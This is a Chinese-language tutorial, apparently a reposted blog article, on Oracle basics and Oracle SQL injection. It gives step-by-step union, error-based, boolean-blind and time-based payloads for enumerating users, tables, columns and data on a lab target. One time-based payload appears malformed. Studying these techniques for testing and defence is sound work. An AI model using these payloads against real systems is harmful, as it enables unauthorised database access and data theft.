2. 程式人生 > 其它 >Oracle SQL注入

Oracle SQL注入

阿新 發佈:2021-11-20

0x00 Oracle基礎

Oracle 基本使用

什麼是Oracle資料庫?

  • Oracle公司目前是世界上最大的軟體提供商之一,與它並列的還有 Microsoft與 Adode。並且隨著 Oracle的發展,它已經成為了企業辦公平臺的最大軟體提供商之一。

  • Oracle資料庫是 Oracle (中文名稱叫甲骨文) 公司的核心產品,Oracle資料庫是—個適合於大中型企業的資料庫管理系統。在所有的資料庫管理系統中(比如:微軟的SQL Server,IBM的DB2等), Oracle的主要使用者涉及面非常廣包括銀行、電信、行動通訊、航空、保險、金融、電子商務和跨國公司等。 Oracle產品是免費的,可以在 Oracle官方網站上下載安裝包,另一方面 Oracle服務是收費的。

  • 官網連結:https://www.oracle.com/cn/index.html

Oracle資料庫的特點

  • 完整的資料管理功能

    • 資料的大量性

    • 資料的儲存永續性

    • 資料庫共享性

  • 完備關係的產品

    • 資訊準則---關係型DBMS的所有資訊都在邏輯上用一種方法,即表中的值顯式地表示

    • 保證訪問的準則

    • 檢視更新準則---只要形成檢視的表中的資料變化了,相應的檢視中的資料同時變化

    • 完整的資料管理功能

    • 分散式處理功能

    • 一個 ORACLE分散式資料庫由 oraclerdbms、sq|Net、 SQLCONNECT和其他非 ORACLE的關係型產品構成

相比於其他資料庫 Oracle的優缺點

  • 優點

  • 開放性:Oracle能在所有主流平臺上執行(包括 windows)完全支援所有工業標準採用完全開放策略使客戶選擇適合解決方案對開發商全力支援

  • 並行性:Oracle並行伺服器通過使組結點共享同簇工作來擴充套件windowNT能力提供高用性和髙伸縮性簇解決方案

  • 安全性:獲得最高認證級別的ISO標準認證。

  • 效能:Oracle效能高保持開放平臺下TPC-D和TPC-C世界記錄

  • 使用風險:Oracle長時間開發經驗完全向下相容得廣泛應用地風險低

  • 缺點

    • 對硬體的要求較高

    • 價格比較昂貴

    • 管理維護較麻煩

    • 操作較複雜,需要技術含量較高

Oracle 常用資料型別

登入Oracle資料庫

Oracle資料庫基本表管理語句

建立表
create table 表名(欄位名稱 型別 約束)
create table ichunqiu(name char(10) primary key,age int)

增加列
alter table 表名 add(欄位名稱, 資料型別)
alter table ichunqiu add(class_name varchar2(200))

刪除表中一列
alter table 表名 set unused column 列名
alter table ichunqiu set unused column name

修改表字段
alter table 表名 modify(欄位名稱 新的欄位型別)
alter table ichunqiu modify(name varchar(200))

** Oracle資料庫基本資料操作語句**

**查詢** 
select *|列名|表示式 from 表名 where 條件 order by 列名
select * from ichunqiu order by age desc  (降序)
select * from ichunqiu order by age asc   (升序)
select * from ichunqiu order by age       (預設就是升序)

**插入** 
insert into 表名 values(所有欄位對應值)
insert into 表名 (欄位名1,欄位名2,欄位名3,...)values(欄位對應值)
insert into ichunqiu(name,age) values('icq',18)
insert into ichunqiu values('icq',18,'web')

**更新** 
update 表名 set 欄位名稱 = 值 where 更新條件
update ichunqiu set age=25 where name='icq'

**刪除** 
delete 表名 where 條件
delete ichunqiu where name='ii'

  • Truncate

  • 語法:truncate table 表名

  • 說明:將表中資料一次性刪除

  • Truncate和 delete區別

  1. truncate是DDL命令,刪除資料不能恢復 ; delete是DML命令,刪除資料可以通過資料庫的日誌檔案進行恢復

  2. 如果一個表中記錄很多, truncate相對 delete速度快

Oracle許可權控制

Oracle許可權概述

  • 許可權允許使用者訪問屬於其它使用者的物件或執行程式,ORACLE系統提供三種許可權: Object物件級、 System系統級、Role角色級。這些許可權可以授予給使用者、特殊使用者 public或角色,如果授予一個許可權給特殊使用者"Public" (使用者 public是 oracle預定義的,每個使用者享有這個使用者享有的許可權)那麼就意味作將該許可權授予了該資料庫的所有使用者。

  • 對管理許可權而言,角色是一個工具,許可權能夠被授予給—個角色,角色也能被授予給另一個角色或使用者。使用者可以通過角色繼承許可權,除了管理許可權外角色服務沒有其它目的。許可權可以被授予,也可以用同樣的方式撤銷

許可權分類

  • Oracle資料庫中許可權分為兩類

  1. 系統許可權:系統規定使用者使用資料庫的許可權。(系統許可權是對使用者而言)

  2. 實體許可權:某種許可權使用者對其它使用者的表或檢視的存取許可權。(是針對表或檢視而言的)

系統許可權(使用者許可權管理)

  • 系統許可權分類

  • DBA:擁有全部特權,是系統最高許可權,只有DBA才可以建立資料庫結構

  • RESOURCE:擁有 Resource許可權的使用者只可以建立實體,不可以建立資料庫結構

  • CONNECT:擁有 Connect許可權的使用者只可以登入 Oracle,不可以建立實體,不可以建立資料庫結構

  • 對於普通使用者:授予 connect, resource許可權

  • 對於DBA管理使用者:授予 connect, resource,dba許可權

系統許可權授權命令

  • 系統許可權只能由DBA使用者授出:sys, system(最開始只能是這兩個使用者)
SQL> grant connect,resource,dba to使用者名稱1[,使用者名稱2]...;

SQL> Create user user50 identified by user50;
SQL> grant connect,resource to user50;

注:普通使用者通過授權可以具有與 system相同的使用者許可權,但不能達到與sys使用者相同的許可權, system使用者的許可權也可以被回收。

實體許可權(表許可權管理)

  • 實體許可權分類

  • select, update, insert, alter, index, delete,all //all括所有許可權

  • execute //執行儲存過程許可權

  • 舉例:

grant select,insert, update on tablename to userA;            --賦權給使用者: userA
grant select, insert, update on tablename to public:          --賦權給所有使用者
grant select, update on product to userA with grant option;   --userA得到許可權,並可以傳遞
revoke select insert, update on tablename from userA;         --收回給予的許可權從使用者
userA revoke select, insert, update on tablename from public; --收回給予的許可權從所有使用者

注意:如果取消某個使用者的物件許可權,那麼對於這個使用者使用 WITH GRANT OPTION授予許可權的使用者來說,同樣還會取消這些使用者的相同許可權,也就是說取消授權時級聯的。

0x01 常見注入型別

引入知識

  • Oracle中的 dual 表介紹

  • 此表是 Oracle資料庫中的一個自帶表 ,它為了滿足查詢條件 而產生

  • dual表的特點

  1. dual是 oracle中的偽表(只有一行一列)

  2. 每個使用者都可以使用

  3. 可能dual表被刪掉,sys可以恢復

  • 在 oracle中使用查詢語句必須跟一個表名,如下:

  • Mysql:union select 1, 2, 3

  • Oracle:union select 1, 2, 3 from dual

  • Oracle的註釋符介紹

  • 單行註釋符號是:--

  • 多行註釋符號是:/**/

  • Oracle的 強匹配 型別

  • 在 Oracle進行類似UNION査詢資料時候必須讓對應位置上的資料型別和表中的列的資料型別是一致的,也可以使用null代替某些無法快速猜測出資料型別的位置

  • 舉例:

  • mysql::union select 1, 2, 3

  • oracle:union select null, null, null from dual

union聯合查詢注入

Oracle union聯合查詢注入基本流程

**1.判斷是否存在注入** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

**2.判斷欄位數** 
當前表有4個欄位
id=1 order by 4--   

**3.聯合查詢找回顯位** 
Oracle 資料庫查詢需要 from dual (虛表/偽表) 專為查詢語句設定的表
union select * from dual--
id=1 union select 1,2,3,4 from dual--
null代替所有型別
id=1 union select null,null,null,null from dual--
id=1 union select 1,'admin',3,4 from dual--

**4.查詢資料庫版本、資料庫連線使用者、當前例項名** 
id=1 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual--
id=1 union select 1,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),3,4 from dual-- #test
id=-1 union select 1,(select instance_name from v$instance),3,4 from dual--

**5.遍歷資料庫名** 
id=-1 union select 1,(select owner from all_tables where rownum=1),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in ('SYS')),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in('SYS','OUTLN','SYSTEM')),3,4 from DUAL--

**6.遍歷表名** 
id=-1 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO','FLAG','ICHUNQIU','STU')),3,4 from DUAL--

**7.遍歷flag表字段名** 
id=-1 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag')),3,4 from DUAL--

**8.查詢表字段資料** 
id=-1 union select 1,(select NAME||AGE FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select "name"||"age" FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1),3,4 from dual--

error 注入

常用顯錯函式

  1. dbms_xdb_version.checkin() 函式

  • 屬於 dbms_xdb_version下的 checkin功能。此功能檢入籤岀的VCR並返回新建立的版本的資源ID。

  • payload:

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
  1. dbms_xdb_version.uncheckout() 函式

  • 用法和checkin一致

  • payload:

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
  1. **utl_inaddr.get_host_name() ** 函式

  • 說明:這種方法在 Oracle 8g,9g,10g中不需要任何許可權,但是在** Oracle 11g及以後的版本中** ,官方加強了訪問控制權限,所以在11g以後要使用此方法進行報錯注入,當前資料庫使用者必須有網路訪問許可權

  • 報錯方法:獲取ip地址,其引數如果解析不了會報錯,顯示傳遞的引數。如果其引數是一個SQL語句,那麼報錯就會把結果給顯示出來。

  • payload:

and utl_inaddr.get_host_name((select user from dual))=1--

其他常用顯錯函式

函式名 payload
dbms_xdb_version.makeversioned() and (select dbms_xdb_version.makeversioned ((select user from dual)) from dual) is not null--
dbms_utility.sqlid_to_sqlhash() and (select dbms_utility.sqlid_to_sqlhash ((select user from dual)) from dual) is not null--
ordsys.ord_dicom.getmappingxpath() and select ordsys.ord_dicom.getmappingxpath ((select user from dual),user,user) =1--
ctxsys.drithsx.sn() and (select ctxsys.drithsx.sn ((select user from dual)) from dual) =1--

Oracle error 注入基本流程

**1.判斷是否存在注入** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

2.**查詢資料庫版本、資料庫連線使用者、當前例項名** 
id=1 and dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)) is not null--
id=1 and dbms_xdb_version.checkin((select instance_name from v$instance)) is not null--

2.**遍歷獲取資料庫名** 
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1 and owner not in ('SYS'))) is not null--

3.**遍歷獲取表名** 
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO'))) is not null--

**4.遍歷獲取欄位名** 
id=1 and dbms_xdb_version.checkin((select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag'))) is not null--

5.**查詢表字段資料** 
id=1 and dbms_xdb_version.checkin((select NAME||AGE FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select "name"||"age" FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1)) is not null--

bool盲注

bool盲注相關函式

  1. decode() ** 函式**

  • 用法 :decode(條件,值1,翻譯值1,值2,翻譯值2… 值n, 翻譯值n,預設值)

  • 含義 :if(條件 == 值1) -> 返回翻譯值1,否則返回預設值

  • 舉例 :查詢 Oracle版本,判斷版本的字串第一個字元是否是O

  • Payload :

and 1=(select decode(substr((select banner from sys.v_$Version where rownum=1),1,1), 'O', 1, 0) from dual--

  • 說明 :其中 select語句可以替換,如:

  • 獲取當前使用者: selectuser from dual;

  • 獲取字元長度: select length(user) from dual;

  1. instr() ** 函式**

  • 用法 :instr( string1, string2 ) / instr(源字串,目標字元)

  • 含義 :搜尋指定的字元返回發現指定的字元的位置, string1是被搜尋的字串, string2是希望搜尋的字串

  • 注入思路 : instr會返回’SQL’位置資料在査詢結果中的位置,未找到便返回0,可通過對‘SQL′位置進行遍歷和迭代,獲取到資料

  • 舉例 :查詢當前的使用者,判斷使用者名稱第一個字元是否是T

  • Payload

and 1=(instr((select user from dual),'T'))--

Oracle bool盲注基本流程

**1.判斷注入** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

2.**查詢資料庫版本/使用者** 
decode decode(substr(('abc'),1,1),'a',1,0)
length 返回字串長度
ascii  返回字元的ascii碼
instr  搜尋指定結果內是否包含關鍵字 存在返回1 否則返回0
id=1 and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
id=1 and (select length(user) from dual)=4-- 
id=1 and (select ascii('a') from dual)=97-- 
id=1 and (select ascii(substr((select user from dual),1,1)) from dual)=84-- #ascii碼判斷字元 T
id=1 and (select ascii(substr((select user from dual),2,1)) from dual)=69-- #ascii碼判斷字元 E

id=1 and 1=(instr((select user from dual),'T'))--
id=1 and 1=(instr((select user from dual),'TE'))--
id=1 and 1=(instr((select user from dual),'TES'))--
id=1 and 1=(instr((select user from dual),'TEST'))--

**3.獲取庫名** 
id=1 and (select length(owner) from all_tables where rownum=1)=3-- #第一個庫名長度為3
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),1,1)) from dual)=83--
#ascii為83 S
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),2,1)) from dual)=89--
#ascii為89 Y
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),3,1)) from dual)=83--
#ascii為83 S

**4.獲取表名** 
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),1,1)) from dual)=105-- 第一個表名的第一個字元是i
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),2,1)) from dual)=99-- 第一個表名的第二個字元是c

**5.獲取欄位名** 
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),1,1)) from dual)=117-- icq表內的第一個欄位的第一個字元u
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),2,1)) from dual)=115-- icq表內的第一個欄位的第二個字元s

time 盲注

time盲注相關函式

  • DBMS_PIPE.RECEIVE_MESSAGE() ** 函式**

  • 用法 :DBMS_PIPE.RECEIVE_MESSAGE(' 任意值 ', 延遲時間 )

  • 舉例 :DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5) 表示從ICQ管道返回的資料需要等待5秒

  • payload

and DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5)=1

常用payload

id=1 and dbms_pipe.receive_message((), 5)=1
id=1 and (select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O', dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
擷取資料庫版本第一個字元為O就延時5s
id=1 and (select decode(length(user),4,dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
使用者名稱長度為4 就延時5s

帶外注入

詳細使用請看 SQL注入 資料外帶 總集篇

相關推薦

Oracle SQL注入

0x00 Oracle基礎 Oracle 基本使用 什麼是Oracle資料庫? Oracle公司目前是世界上最大的軟體提供商之一,與它並列的還有 Microsoft與 Adode。並且隨著 Oracle的發展,它已經成為了企業辦公平臺的最大軟體提供商之

ORACLE SQL 注入

ORACLE SQL 注入 簡介 Oracle Database,又名Oracle RDBMS,或簡稱Oracle。是甲骨文公司的一款關係資料庫管理系統,此資料庫體量較大,一般與jsp網站聯合。其注入原理與MySQL一致。

sql注入原理及防範

前言         sql注入是一種危險係數較高的攻擊方式,現在由於我們持久層框架越來越多,大部分框架會處理這個問題,因此導致我們對它的關注度越來越少了。最近部門在整理安全漏洞時,提到了一些關於sql注入的修改

詳解SQL注入--安全(二)

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

關於sql注入的簡要演示(入坑拋磚)

首先可能大家都會問什麼是sql? Sql是資料庫的一種型別,是用來儲存網站資料的。

淺談一次與sql注入 & webshell 的美麗“邂逅”

引言 一波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的

pymysql如何解決sql注入問題深入講解

1. SQL 注入 SQL 注入是非常常見的一種網路攻擊方式,主要是通過引數來讓 mysql 執行 sql 語句時進行預期之外的操作。

使用PDO防sql注入的原理分析

前言 本文使用pdo的預處理方式可以避免sql注入。下面話不多說了,來一起看看詳細的介紹吧

SQL注入的2個小Trick及示例總結

前言 最近發現了兩個關於sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細的介紹吧

SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

oracle sql語言模糊查詢--萬用字元like的使用教程詳解

oracle在Where子句中,可以對datetime、char、varchar欄位型別的列用Like子句配合萬用字元選取那些“很像...”的資料記錄,以下是可使用的萬用字元:

深入瞭解SQL注入

1 .什麼是sql注入Sql injection)? Sql注入是一種將sql程式碼新增到輸入引數中,傳遞到Sql伺服器解析並執行的一種攻擊手法

使用keras做SQL注入攻擊的判斷(例項講解)

本文是通過深度學習框架keras來做SQL注入特徵識別, 不過雖然用了keras,但是大部分還是普通的神經網路,只是外加了一些規則化、dropout層(隨著深度學習出現的層)。

SQL注入原理與解決方法程式碼示例

一、什麼是sql注入? 1、什麼是sql注入呢? 所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令,比如先前的很多影視網站洩露VIP會員密碼大多

ORACLE SQL語句優化技術要點解析

操作符優化: IN 操作符   用IN寫出來的SQL的優點是比較容易寫及清晰易懂,這比較適合現代軟體開發的風格。

python+Django實現防止SQL注入的辦法

先看看那種容易被注入SQL id = 11001 sql = \"\"\" SELECT id,name,age FROM student WHERE id = \"\"\"+id+\"\"\"

Web安全-SQL注入:MySQL注入天書(5-6) Blind Injection

文章目錄內容布林型盲注##########注入點判斷撞資料庫版本撞資料庫名使用sqlmap做布林型盲注的猜解

sql注入總結

sql注入定義 就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行的sql命令的目的。

【墨者學院--靶場篇】題目十八:日誌檔案分析溯源(SQL注入IP地址)

日誌檔案分析溯源(SQL注入IP地址) 難易程度:一顆星 分類:電子資料取證 標籤:日誌分析電子資料資料分析

CG CTF SQL注入1

題目連結 原始碼 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . \':\' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);